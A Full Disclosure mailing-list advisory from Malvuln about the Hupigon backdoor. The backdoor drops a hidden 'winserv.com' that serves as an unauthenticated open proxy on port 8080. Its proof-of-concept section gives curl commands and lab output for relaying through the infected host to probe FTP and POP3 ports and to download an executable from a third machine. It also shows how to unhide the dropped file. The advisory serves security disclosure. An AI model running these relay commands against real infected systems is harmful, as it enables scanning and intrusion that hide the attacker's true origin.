
Date: Wed, 7 Apr 2021 20:36:50 -0400
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Backdoor.Win32.Hupigon.das / Unauthenticated Open Proxy

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source:
https://malvuln.com/advisory/7afe56286039faf56d4184c476683340.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Hupigon.das
Vulnerability: Unauthenticated Open Proxy
Description: The malware drops an hidden executable named "winserv.com"
under Windows dir, which accepts TCP connections on port 8080. Afterwards,
it connects to a destination, and relays requests from the original
connection to the destination and then back to the origination system.
Attackers who can reach an infected system may launch attacks, download
files or port scan third party systems and it will appear as the attacks
originated from that infected host. The relay does not require
authentication or any special User-agent check and leverages the HTTP Host
header in the request to connect to third-party systems.
Type: PE32
MD5: 7afe56286039faf56d4184c476683340
Vuln ID: MVID-2021-0166
Dropped files: winserv.com
Disclosure: 04/07/2021

Exploit/PoC:
Scan FTP port 21)

curl -v http://192.168.88.128:8080 -H "Host: 192.168.88.129:21"
* Rebuilt URL to: http://192.168.88.128:8080/
*   Trying 192.168.88.128...
* TCP_NODELAY set
* Connected to 192.168.88.128 (192.168.88.128) port 8080 (#0)
> GET / HTTP/1.1
> Host: 192.168.88.129:21
> User-Agent: curl/7.55.1
> Accept: */*
>
220 INetSim FTP Service ready.


Scan POP3 port 110)

curl -vv http://192.168.88.128:8080 -H "Host: 192.168.88.129:110"
* Rebuilt URL to: http://192.168.88.128:8080/
*   Trying 192.168.88.128...
* TCP_NODELAY set
* Connected to 192.168.88.128 (192.168.88.128) port 8080 (#0)
> GET / HTTP/1.1
> Host: 192.168.88.129:110
> User-Agent: curl/7.55.1
> Accept: */*
>
+OK INetSim POP3 Server ready <57612.1617679472@...3host>


Download files, DOOM.exe lives on 88.129)

curl -v http://192.168.88.128:8080/DOOM.exe -H "Host: 192.168.88.129:2222"
 --out  2.exe
*   Trying 192.168.88.128...
* TCP_NODELAY set
  % Total    % Received % Xferd  Average Speed   Time    Time     Time
 Current
                                 Dload  Upload   Total   Spent    Left
 Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--
  0* Connected to 192.168.88.128 (192.168.88.128) port 8080 (#0)
> GET /DOOM.exe HTTP/1.1
> Host: 192.168.88.129:2222
> User-Agent: curl/7.55.1
> Accept: */*
>
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Server: SimpleHTTP/0.6 Python/2.7.6
< Date: Tue, 06 Apr 2021 03:35:52 GMT
< Content-type: application/x-msdos-program
< Content-Length: 103533
< Last-Modified: Sat, 03 Aug 2019 04:57:12 GMT
<
{ [83868 bytes data]
100  101k  100  101k    0     0   101k      0  0:00:01 --:--:--  0:00:01
 498k
* Closing connection 0


The executable dropped by this malware lives here, use attrib -s -h to
unhide it.
C:\Windows>dir winserv.com
 Volume in drive C has no label.

 Directory of C:\Windows

File Not Found

C:\Windows>attrib -s -h winserv.com

C:\Windows>dir winserv.com
 Volume in drive C has no label.

 Directory of C:\Windows

06/16/2012  02:53 AM           780,288 winserv.com
               1 File(s)        780,288 bytes


Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
